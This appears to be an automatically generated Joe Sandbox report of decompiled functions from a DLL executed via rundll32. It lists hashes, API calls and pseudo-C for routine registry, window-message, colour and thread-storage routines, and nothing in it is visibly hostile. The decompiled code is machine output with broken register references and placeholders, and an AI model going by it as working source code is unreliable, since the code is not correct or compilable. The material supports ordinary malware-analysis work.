Associated: 00000004.00000002.247870468.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247887534.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.247951846.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247958973.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247967564.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: MetricsSystem$CapsDevice$Release
String ID:
API String ID: 1151147025-0
Opcode ID: db9cd225bf41a8a16edb532eadca07c49390effd78a228ecd5040edfe1a92329
Instruction ID: d97b14313f3971f9b273ebf2d99ed84bfce9517748686708ee6192b13dda979b
Opcode Fuzzy Hash: db9cd225bf41a8a16edb532eadca07c49390effd78a228ecd5040edfe1a92329
Instruction Fuzzy Hash: CEF03071A40714AFFB20AF728CC9F677BA8EB81B51F11491AE6428B6D0D7B59806CF50

Uniqueness

Uniqueness Score: -1.00%

Function 1000BD98, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117
registryCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E1000BD98(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, signed int _a264, char _a268) {
				char _v4;
				intOrPtr _v12;
				char* _v16;
				void* _v20;
				char* _v24;
				char _v28;
				long _v32;
				char _v36;
				char _v272;
				char _v280;
				intOrPtr _v292;
				void* __ebp;
				signed int _t40;
				char _t44;
				void* _t47;
				void* _t54;
				char* _t61;
				void* _t77;
				void* _t80;
				void* _t81;
				intOrPtr _t94;
				void* _t98;
				void* _t100;
				void* _t101;
				char* _t104;

				_t95 = __edx;
				_t81 = __ecx;
				_t79 = __ebx;
				_t104 =  &_v272;
				_t40 =  *0x10057a08; // 0xfbf2b489
				_a264 = _t40 ^ _t104;
				_push(0x18);
				E10017BC1(E10027F63, __ebx, __edi, __esi);
				_t100 = __ecx;
				_v20 = 0;
				_v32 = 0;
				_t44 = E1000BB54(__ecx, __edx);
				_v28 = _t44;
				if(_t44 != 0) {
					do {
						__eax =  &_v28;
						_push(__eax);
						__ecx = __esi;
						E1000BB65();
						__eflags = __eax - __edi;
						if(__eax != __edi) {
							__edx =  *__eax;
							__ecx = __eax;
							__eax =  *((intOrPtr*)(__edx + 0xc))(__edi, 0xfffffffc, __edi, __edi);
						}
						__eflags = _v28 - __edi;
					} while (_v28 != __edi);
				}
				__eflags =  *(_t100 + 0x54);
				if( *(_t100 + 0x54) == 0) {
					L15:
					 *[fs:0x0] = _v12;
					_pop(_t98);
					_pop(_t101);
					_pop(_t80);
					_t47 = E100167D5(1, _t80, _a264 ^ _t104, _t95, _t98, _t101);
					__eflags =  &_a268;
					return _t47;
				} else {
					__eflags =  *(_t100 + 0x68);
					__eflags = 0 |  *(_t100 + 0x68) != 0x00000000;
					if(__eflags != 0) {
						_push("Software\\");
						E10009FA3(_t79,  &_v16, 0, _t100, __eflags);
						_v4 = 0;
						E10009F7E(_t79,  &_v16,  *(_t100 + 0x54));
						_push(0x1002a248);
						_push( &_v16);
						_push( &_v36);
						_t54 = E1000BC25(_t79, 0, _t100, __eflags);
						_push( *(_t100 + 0x68));
						_v4 = 1;
						_push(_t54);
						_push( &_v24);
						E1000BC25(_t79, 0, _t100, __eflags);
						_v4 = 3;
						E10009CB7(_v36 + 0xfffffff0, _t95);
						_push( &_v24);
						_push(0x80000001);
						E1000BC89(_t79, 0, 0x80000001, __eflags);
						_t61 = RegOpenKeyA(0x80000001, _v16,  &_v20);
						__eflags = _t61;
						if(_t61 == 0) {
							__eflags = RegEnumKeyA(_v20, 0, _t104, 0x104) - 0x103;
							if(__eflags == 0) {
								_push( &_v16);
								_push(0x80000001);
								E1000BC89(_t79, 0, 0x80000001, __eflags);
							}
							RegCloseKey(_v20);
						}
						RegQueryValueA(0x80000001, _v24, _t104,  &_v32);
						E10009CB7( &(_v24[0xfffffffffffffff0]), _t95);
						__eflags =  &(_v16[0xfffffffffffffff0]);
						E10009CB7( &(_v16[0xfffffffffffffff0]), _t95);
						goto L15;
					} else {
						_push(_t104);
						_push(_t81);
						_v280 = 0x10057298;
						E10017C83( &_v280, 0x1002e2fc);
						asm("int3");
						_push(4);
						E10017BC1(E10027DEC, _t79, 0, _t100);
						_t94 = E10013965(0x104);
						_v292 = _t94;
						_t77 = 0;
						_v280 = 0;
						if(_t94 != 0) {
							_t77 = E1000CF71(_t94);
						}
						return E10017C60(_t77);
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 1000BDB7
RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 1000BE73
RegEnumKeyA.ADVAPI32(?,00000000,00000000,00000104), ref: 1000BE8A
RegCloseKey.ADVAPI32(?,?,?,?,?,Software\,00000018), ref: 1000BEA4
RegQueryValueA.ADVAPI32(80000001,?,?,?), ref: 1000BEB6

Strings

Software\, xrefs: 1000BE0C

Memory Dump Source

Source File: 00000004.00000002.247805728.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.247799893.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247870468.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247887534.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.247951846.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247958973.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247967564.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: CloseEnumH_prolog3OpenQueryValue
String ID: Software\
API String ID: 3878845136-964853688
Opcode ID: 7ebb37ec80ad41570234b5e56baee62c3bc695e135d0d4cdd5ea00e84b8678cd
Instruction ID: bb9b01b2753fba5bda47465ad6778d866e06322e4a0b808ca87f46191af68194
Opcode Fuzzy Hash: 7ebb37ec80ad41570234b5e56baee62c3bc695e135d0d4cdd5ea00e84b8678cd
Instruction Fuzzy Hash: 6241AC31900559AFEB11DFA4CC81EFEB7B9EF48390F20052AF552E2294DB74AA45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 1000F6F2, Relevance: 10.6, APIs: 7, Instructions: 115
windowCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E1000F6F2(intOrPtr* __ecx, signed int _a4) {
				struct HWND__* _v4;
				struct tagMSG* _v8;
				int _v12;
				int _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HWND__* _t42;
				struct tagMSG* _t43;
				signed int _t45;
				void* _t48;
				void* _t50;
				int _t53;
				long _t56;
				signed int _t62;
				intOrPtr* _t64;
				intOrPtr* _t67;
				void* _t68;

				_t63 = __ecx;
				_t62 = 1;
				_t67 = __ecx;
				_v12 = 1;
				_v16 = 0;
				if((_a4 & 0x00000004) == 0 || (E10012862(__ecx) & 0x10000000) != 0) {
					_t62 = 0;
				}
				_t42 = GetParent( *(_t67 + 0x20));
				 *(_t67 + 0x3c) =  *(_t67 + 0x3c) | 0x00000018;
				_v4 = _t42;
				_t43 = E1000B519(0);
				_t68 = UpdateWindow;
				_v8 = _t43;
				while(1) {
					L14:
					_t73 = _v12;
					if(_v12 == 0) {
						goto L15;
					}
					__eflags = PeekMessageA(_v8, 0, 0, 0, 0);
					if(__eflags != 0) {
						while(1) {
							L15:
							_t45 = E1000B911(_t63, 0, _t67, _t73);
							if(_t45 == 0) {
								break;
							}
							if(_t62 != 0) {
								_t53 = _v8->message;
								if(_t53 == 0x118 || _t53 == 0x104) {
									E100128D7(_t67, 1);
									UpdateWindow( *(_t67 + 0x20));
									_t62 = 0;
								}
							}
							_t64 = _t67;
							_t48 =  *((intOrPtr*)( *_t67 + 0x80))();
							_t79 = _t48;
							if(_t48 == 0) {
								_t39 = _t67 + 0x3c;
								 *_t39 =  *(_t67 + 0x3c) & 0xffffffe7;
								__eflags =  *_t39;
								return  *((intOrPtr*)(_t67 + 0x44));
							} else {
								_t50 = E1000B82B(_t62, _t64, 0, _t67, _t68, _t79, _v8);
								_pop(_t63);
								if(_t50 != 0) {
									_v12 = 1;
									_v16 = 0;
								}
								if(PeekMessageA(_v8, 0, 0, 0, 0) != 0) {
									continue;
								} else {
									goto L14;
								}
							}
						}
						_push(0);
						E1000A5E4();
						return _t45 | 0xffffffff;
					}
					__eflags = _t62;
					if(_t62 != 0) {
						_t63 = _t67;
						E100128D7(_t67, 1);
						UpdateWindow( *(_t67 + 0x20));
						_t62 = 0;
						__eflags = 0;
					}
					__eflags = _a4 & 0x00000001;
					if((_a4 & 0x00000001) == 0) {
						__eflags = _v4;
						if(_v4 != 0) {
							__eflags = _v16;
							if(_v16 == 0) {
								SendMessageA(_v4, 0x121, 0,  *(_t67 + 0x20));
							}
						}
					}
					__eflags = _a4 & 0x00000002;
					if(__eflags != 0) {
						L13:
						_v12 = 0;
						continue;
					} else {
						_t56 = SendMessageA( *(_t67 + 0x20), 0x36a, 0, _v16);
						_v16 = _v16 + 1;
						__eflags = _t56;
						if(__eflags != 0) {
							continue;
						}
						goto L13;
					}
				}
				goto L15;
			}

APIs

GetParent.USER32(?), ref: 1000F720
PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 1000F747
UpdateWindow.USER32(?), ref: 1000F761
SendMessageA.USER32 ref: 1000F785
SendMessageA.USER32 ref: 1000F79F
UpdateWindow.USER32(?), ref: 1000F7E5
PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 1000F819

Part of subcall function 10012862: GetWindowLongA.USER32 ref: 1001286D

Memory Dump Source

Source File: 00000004.00000002.247805728.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.247799893.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247870468.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247887534.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.247951846.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247958973.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247967564.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: Message$Window$PeekSendUpdate$LongParent
String ID:
API String ID: 2853195852-0
Opcode ID: 1a7b99641fbd6274f08d233d62057ee23ad71d0a046cd1d00a2b03b8b2250d72
Instruction ID: ecef1c15dac149fec5e590ec2565d957468d58fa3f8c06f10f68a2e84cd0c50c
Opcode Fuzzy Hash: 1a7b99641fbd6274f08d233d62057ee23ad71d0a046cd1d00a2b03b8b2250d72
Instruction Fuzzy Hash: 3041C1312087429BE711CF258C88A2BBAF4FFC5BD4F10092DF589928A4DB71D946EB53

Uniqueness

Uniqueness Score: -1.00%

Function 1000AE8A, Relevance: 10.6, APIs: 7, Instructions: 111
windowCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E1000AE8A(int __ebx, long __ecx, struct HWND__* __edi) {
				long _v4;
				char _v28;
				intOrPtr _v40;
				void* __esi;
				void* __ebp;
				long _t20;
				long _t21;
				struct HWND__* _t22;
				long _t23;
				struct HWND__* _t24;
				long _t25;
				struct HWND__* _t26;
				void* _t33;
				void* _t35;
				long _t39;
				long _t41;
				intOrPtr _t43;
				struct HWND__* _t47;
				struct HWND__* _t49;
				long _t51;
				long _t53;

				_t46 = __edi;
				_t39 = __ecx;
				_t37 = __ebx;
				if( *((intOrPtr*)(__ecx + 0x78)) == 0) {
					_t51 = E1000A7CE();
					__eflags = _t51;
					if(_t51 != 0) {
						_t20 =  *((intOrPtr*)( *_t51 + 0x120))();
						__eflags = _t20;
						_t41 = _t51;
						_pop(_t52);
						if(_t20 != 0) {
							_t53 = _t41;
							_t21 =  *(_t53 + 0x64);
							__eflags = _t21;
							if(_t21 == 0) {
								_pop(_t52);
								goto L12;
							} else {
								__eflags = _t21 - 0x3f107;
								if(__eflags != 0) {
									_t35 = E1000D5EC(__ebx, __edi, _t53, __eflags);
									_t21 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t35 + 4)))) + 0xac))( *(_t53 + 0x64), 1);
								}
								return _t21;
							}
						} else {
							L12:
							_push(_t41);
							_push(_t37);
							_push(0);
							_push(_t52);
							_push(_t46);
							_v4 = _t41;
							_t22 = GetCapture();
							_t51 = SendMessageA;
							_t37 = 0x365;
							while(1) {
								_t47 = _t22;
								__eflags = _t47;
								if(_t47 == 0) {
									break;
								}
								_t23 = SendMessageA(_t47, _t37, 0, 0);
								__eflags = _t23;
								if(__eflags != 0) {
									L27:
									return _t23;
								} else {
									_t22 = E10010DA7(_t41, _t47, __eflags, _t47);
									continue;
								}
								goto L33;
							}
							_t24 = GetFocus();
							while(1) {
								_t46 = _t24;
								__eflags = _t46;
								if(_t46 == 0) {
									break;
								}
								_t23 = SendMessageA(_t46, _t37, 0, 0);
								__eflags = _t23;
								if(__eflags != 0) {
									goto L27;
								} else {
									_t24 = E10010DA7(_t41, _t46, __eflags, _t46);
									continue;
								}
								goto L33;
							}
							_t39 = _v4;
							_t25 = E10010DEC(_t37, _t39, _t46);
							__eflags = _t25;
							if(_t25 != 0) {
								_t26 = GetLastActivePopup( *(_t25 + 0x20));
								while(1) {
									_t49 = _t26;
									__eflags = _t49;
									_push(0);
									if(_t49 == 0) {
										break;
									}
									_t23 = SendMessageA(_t49, _t37, 0, ??);
									__eflags = _t23;
									if(__eflags == 0) {
										_t26 = E10010DA7(_t39, _t49, __eflags, _t49);
										continue;
									}
									goto L27;
								}
								_t23 = SendMessageA( *(_v4 + 0x20), 0x111, 0xe147, ??);
								goto L27;
							} else {
								goto L1;
							}
						}
					} else {
						L1:
						_push(0);
						_push(_t39);
						_v28 = 0x10057298;
						E10017C83( &_v28, 0x1002e2fc);
						asm("int3");
						_push(4);
						E10017BC1(E10027DEC, _t37, _t46, _t51);
						_t43 = E10013965(0x104);
						_v40 = _t43;
						_t33 = 0;
						_v28 = 0;
						if(_t43 != 0) {
							_t33 = E1000CF71(_t43);
						}
						return E10017C60(_t33);
					}
				} else {
					__eflags = __eax - 0x3f107;
					if(__eax != 0x3f107) {
						return  *((intOrPtr*)( *__ecx + 0xac))(__eax, 1);
					}
					return __eax;
				}
				L33:
			}

APIs

GetCapture.USER32 ref: 10014232
SendMessageA.USER32 ref: 1001424B
GetFocus.USER32(?,?,?,?,00000000), ref: 1001425D
SendMessageA.USER32 ref: 10014269
GetLastActivePopup.USER32(?), ref: 10014290
SendMessageA.USER32 ref: 1001429B
SendMessageA.USER32 ref: 100142BF

Memory Dump Source

Source File: 00000004.00000002.247805728.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.247799893.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247870468.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247887534.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.247951846.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247958973.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247967564.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: MessageSend$ActiveCaptureFocusLastPopup
String ID:
API String ID: 3219385341-0
Opcode ID: ece27361fccefe4c1d9af4d39d412bb8da5438b11630c38f166ec2a3b357e9a2
Instruction ID: 33038f709047c962cd6e8134d606cff9e197d9281aa775ba373aba56dbca1b45
Opcode Fuzzy Hash: ece27361fccefe4c1d9af4d39d412bb8da5438b11630c38f166ec2a3b357e9a2
Instruction Fuzzy Hash: D031E331300256EBE611EB24DC84E6E7AEDEF866D5B630629F841DF160CF71ECC19661

Uniqueness

Uniqueness Score: -1.00%

Function 1000FC8A, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000FC8A(intOrPtr* __ecx) {
				struct HWND__* _v40;
				struct HWND__* _v44;
				intOrPtr _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t43;
				struct HWND__* _t48;
				long _t61;
				intOrPtr* _t63;
				signed int _t64;
				void* _t69;
				intOrPtr _t71;
				intOrPtr* _t72;

				_t72 = __ecx;
				_t69 = E1000B510();
				if(_t69 != 0) {
					if( *((intOrPtr*)(_t69 + 0x20)) == __ecx) {
						 *((intOrPtr*)(_t69 + 0x20)) = 0;
					}
					if( *((intOrPtr*)(_t69 + 0x24)) == _t72) {
						 *((intOrPtr*)(_t69 + 0x24)) = 0;
					}
				}
				_t63 =  *((intOrPtr*)(_t72 + 0x48));
				if(_t63 != 0) {
					 *((intOrPtr*)( *_t63 + 0x50))();
					 *((intOrPtr*)(_t72 + 0x48)) = 0;
				}
				_t64 =  *(_t72 + 0x4c);
				if(_t64 != 0) {
					 *((intOrPtr*)( *_t64 + 4))(1);
				}
				 *(_t72 + 0x4c) =  *(_t72 + 0x4c) & 0x00000000;
				_t83 =  *(_t72 + 0x3c) & 1;
				if(( *(_t72 + 0x3c) & 1) != 0) {
					_t71 =  *((intOrPtr*)(E1000D61F(1, _t64, _t69, _t72, _t83) + 0x3c));
					if(_t71 != 0) {
						_t85 =  *(_t71 + 0x20);
						if( *(_t71 + 0x20) != 0) {
							E100174D0(_t71,  &_v52, 0, 0x30);
							_t48 =  *(_t72 + 0x20);
							_v44 = _t48;
							_v40 = _t48;
							_v52 = 0x28;
							_v48 = 1;
							SendMessageA( *(_t71 + 0x20), 0x405, 0,  &_v52);
						}
					}
				}
				_t61 = GetWindowLongA( *(_t72 + 0x20), 0xfffffffc);
				E1000FAB8(_t61, _t72, GetWindowLongA, _t85);
				if(GetWindowLongA( *(_t72 + 0x20), 0xfffffffc) == _t61) {
					_t43 =  *( *((intOrPtr*)( *_t72 + 0xf0))());
					if(_t43 != 0) {
						SetWindowLongA( *(_t72 + 0x20), 0xfffffffc, _t43);
					}
				}
				E1000FBD6(_t61, _t72);
				return  *((intOrPtr*)( *_t72 + 0x114))();
			}

APIs

_memset.LIBCMT ref: 1000FD17
SendMessageA.USER32 ref: 1000FD40
GetWindowLongA.USER32 ref: 1000FD52
GetWindowLongA.USER32 ref: 1000FD63
SetWindowLongA.USER32(?,000000FC,?), ref: 1000FD7F

Strings

(, xrefs: 1000FD36

Memory Dump Source

Source File: 00000004.00000002.247805728.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.247799893.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247870468.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247887534.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.247951846.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247958973.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247967564.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: LongWindow$MessageSend_memset
String ID: (
API String ID: 2997958587-3887548279
Opcode ID: 334c7e26ab9e293c68ecfd01600b3aa59bde0f1c2bd920c06c28c769ee1fcf56
Instruction ID: 83308454b4964f7b832e75e01b7e263ef3bf02c7b32fea1d5a5d450cbed2f8d3
Opcode Fuzzy Hash: 334c7e26ab9e293c68ecfd01600b3aa59bde0f1c2bd920c06c28c769ee1fcf56
Instruction Fuzzy Hash: 2E31B0756006159FEB14EF68C985A6EB7F9FF082D0F15052EE9469BA95EB30F800CB90

Uniqueness

Uniqueness Score: -1.00%

Function 10013E40, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10013E40(intOrPtr __ecx) {
				void* _v8;
				void* _v12;
				void* _v16;
				int _v20;
				intOrPtr _v24;
				intOrPtr _t32;

				_t32 = __ecx;
				_v24 = __ecx;
				_v16 = 0;
				_v8 = 0;
				_v12 = 0;
				if(RegOpenKeyExA(0x80000001, "software", 0, 0x2001f,  &_v8) == 0 && RegCreateKeyExA(_v8,  *(_t32 + 0x54), 0, 0, 0, 0x2001f, 0,  &_v12,  &_v20) == 0) {
					RegCreateKeyExA(_v12,  *(_v24 + 0x68), 0, 0, 0, 0x2001f, 0,  &_v16,  &_v20);
				}
				if(_v8 != 0) {
					RegCloseKey(_v8);
				}
				if(_v12 != 0) {
					RegCloseKey(_v12);
				}
				return _v16;
			}

0x10013e5b
0x10013e62
0x10013e65
0x10013e68
0x10013e6b
0x10013e76
0x10013ead
0x10013ead
0x10013eb8
0x10013ebd
0x10013ebd
0x10013ec2
0x10013ec7
0x10013ec7
0x10013ed0

APIs

RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?), ref: 10013E6E
RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 10013E91
RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 10013EAD
RegCloseKey.ADVAPI32(?), ref: 10013EBD
RegCloseKey.ADVAPI32(?), ref: 10013EC7

Strings

software, xrefs: 10013E56

Memory Dump Source

Source File: 00000004.00000002.247805728.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.247799893.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247870468.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247887534.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.247951846.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247958973.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247967564.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: CloseCreate$Open
String ID: software
API String ID: 1740278721-2010147023
Opcode ID: 274d387f2041077595a9ef0d73c23cf33c700d5c2420ca228f327ec70e6c6d43
Instruction ID: 4673323d0336752e6ce9d3e664aa048b12ff1b48ba7cb76d312e9863fa3d259e
Opcode Fuzzy Hash: 274d387f2041077595a9ef0d73c23cf33c700d5c2420ca228f327ec70e6c6d43
Instruction Fuzzy Hash: 7711B676D00259BBDB11DB9ACD88DDFBFFCEF85740B1040AAA504A2121D2719A55DB60

Uniqueness

Uniqueness Score: -1.00%

Function 10013CEE, Relevance: 10.6, APIs: 7, Instructions: 51
memoryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E10013CEE(void* __ecx, long* __edi, void* __esi) {
				long _t22;
				void* _t23;
				void* _t28;
				void* _t31;
				void* _t33;
				signed int _t35;
				long* _t40;
				void* _t41;
				void* _t42;

				_t41 = __esi;
				_t40 = __edi;
				_t31 = __ecx;
				LeaveCriticalSection( *((intOrPtr*)(_t42 - 0x18)) + 0x1c);
				E10017C83(0, 0);
				_t22 = E100134F9(_t31, 0, __edi[3], 4);
				_t33 = 2;
				_t23 = LocalReAlloc( *(__esi + 0xc), _t22, ??);
				_t46 = _t23;
				if(_t23 == 0) {
					LeaveCriticalSection( *(_t42 - 0x14));
					_t23 = E1000A0A7(0, _t33, __edi, __esi, _t46);
				}
				 *(_t41 + 0xc) = _t23;
				E100174D0(_t40, _t23 +  *(_t41 + 8) * 4, 0, _t40[3] -  *(_t41 + 8) << 2);
				 *(_t41 + 8) = _t40[3];
				TlsSetValue( *_t40, _t41);
				_t35 =  *(_t42 + 8);
				_t28 =  *(_t41 + 0xc);
				if(_t28 != 0 && _t35 <  *(_t41 + 8)) {
					 *((intOrPtr*)(_t28 + _t35 * 4)) =  *((intOrPtr*)(_t42 + 0xc));
				}
				_push( *(_t42 - 0x14));
				LeaveCriticalSection();
				return E10017C60(_t28);
			}

APIs

LeaveCriticalSection.KERNEL32(?), ref: 10013CF5
__CxxThrowException@8.LIBCMT ref: 10013CFF

Part of subcall function 10017C83: RaiseException.KERNEL32(?,?,?,?), ref: 10017CC3

LocalReAlloc.KERNEL32(?,00000000,00000002,00000000,00000010,?,?,00000000,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004), ref: 10013D16
LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004,10001441,00000000), ref: 10013D23

Part of subcall function 1000A0A7: __CxxThrowException@8.LIBCMT ref: 1000A0BB

_memset.LIBCMT ref: 10013D42
TlsSetValue.KERNEL32(?,00000000), ref: 10013D53
LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004,10001441,00000000), ref: 10013D74

Memory Dump Source

Source File: 00000004.00000002.247805728.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.247799893.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247870468.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247887534.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.247951846.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247958973.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247967564.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: CriticalLeaveSection$Exception@8Throw$AllocExceptionLocalRaiseValue_memset
String ID:
API String ID: 356813703-0
Opcode ID: 7dcaef9dd6dc2c20a9afc37e1070812523d3c5c417591cb16522903d097c7fc3
Instruction ID: da2c65ce7076d342f4508b5b0ea9d94b5e5006c79099ef9a6e76071fa7915ca4
Opcode Fuzzy Hash: 7dcaef9dd6dc2c20a9afc37e1070812523d3c5c417591cb16522903d097c7fc3
Instruction Fuzzy Hash: BD118E7450060AAFE710EF65DC8AC1BBBB9FF04354720C128F4599A566CB30ECA0CB50

Uniqueness

Uniqueness Score: -1.00%

Function 10013810, Relevance: 10.5, APIs: 7, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10013810(void* __ecx) {
				struct HBRUSH__* _t14;
				void* _t18;

				_t18 = __ecx;
				 *((intOrPtr*)(_t18 + 0x28)) = GetSysColor(0xf);
				 *((intOrPtr*)(_t18 + 0x2c)) = GetSysColor(0x10);
				 *((intOrPtr*)(_t18 + 0x30)) = GetSysColor(0x14);
				 *((intOrPtr*)(_t18 + 0x34)) = GetSysColor(0x12);
				 *((intOrPtr*)(_t18 + 0x38)) = GetSysColor(6);
				 *((intOrPtr*)(_t18 + 0x24)) = GetSysColorBrush(0xf);
				_t14 = GetSysColorBrush(6);
				 *(_t18 + 0x20) = _t14;
				return _t14;
			}

0x1001381a
0x10013820
0x10013827
0x1001382e
0x10013835
0x10013842
0x10013849
0x1001384c
0x1001384f
0x10013853

APIs

GetSysColor.USER32(0000000F), ref: 1001381C
GetSysColor.USER32(00000010), ref: 10013823
GetSysColor.USER32(00000014), ref: 1001382A
GetSysColor.USER32(00000012), ref: 10013831
GetSysColor.USER32(00000006), ref: 10013838
GetSysColorBrush.USER32(0000000F), ref: 10013845
GetSysColorBrush.USER32(00000006), ref: 1001384C

Memory Dump Source

Source File: 00000004.00000002.247805728.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.247799893.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247870468.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247887534.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.247951846.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247958973.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247967564.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: Color$Brush
String ID:
API String ID: 2798902688-0
Opcode ID: ec9fc2993fab2a5d820fe3d8a281f31af429397108a6c3a84ca499368f54399a
Instruction ID: 74b272bfbd302397870cb0a2abf86f81c97ca9371361d4e5ce15514e9afb48cd
Opcode Fuzzy Hash: ec9fc2993fab2a5d820fe3d8a281f31af429397108a6c3a84ca499368f54399a
Instruction Fuzzy Hash: E8F01C71940748ABE730BF728D49B47BAE5FFC4B10F12092ED2858BA90E6B6E041DF40

Uniqueness

Uniqueness Score: -1.00%

Function 10028DE5, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 24
registrywindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10028DE5() {
				long _t5;
				int _t6;

				if((0x80000000 & GetVersion()) == 0 || GetVersion() != 4) {
					_t5 = GetVersion();
					if((0x80000000 & _t5) != 0) {
						L5:
						 *0x1005acc4 =  *0x1005acc4 & 0x00000000;
						return _t5;
					}
					_t5 = GetVersion();
					if(_t5 != 3) {
						goto L5;
					}
					goto L4;
				} else {
					L4:
					_t6 = RegisterWindowMessageA("MSWHEEL_ROLLMSG");
					 *0x1005acc4 = _t6;
					return _t6;
				}
			}

0x10028df6
0x10028e00
0x10028e04
0x10028e20
0x10028e20
0x00000000
0x10028e20
0x10028e06
0x10028e0c
0x00000000
0x00000000
0x00000000
0x10028e0e
0x10028e0e
0x10028e13
0x10028e19
0x00000000
0x10028e19

APIs

